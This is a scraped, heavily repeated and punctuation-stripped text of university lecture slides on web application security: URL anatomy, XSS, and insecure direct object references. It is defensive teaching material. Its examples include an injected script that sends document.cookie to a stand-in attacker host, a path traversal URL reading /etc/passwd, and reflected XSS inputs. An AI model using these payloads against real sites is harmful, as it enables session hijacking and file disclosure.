Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 4: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

OWASP Top 10 List

Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Structure of URLs

Full URLs specified in RFC 3986 have up to eight parts

URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment

1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)

Parts 3-5 together are called the authority

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names are assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL adhoc schemes in browsersEacute eg javascript about config

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 5: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Structure of URLs

Full URLs specified in RFC 3986 have up to eight parts

URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment

1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)

Parts 3-5 together are called the authority

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names are assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL adhoc schemes in browsersEacute eg javascript about config

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 6: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Structure of URLs

Full URLs specified in RFC 3986 have up to eight parts

URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment

1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)

Parts 3-5 together are called the authority

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names are assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL adhoc schemes in browsersEacute eg javascript about config

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 7: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names are assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL adhoc schemes in browsersEacute eg javascript about config

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

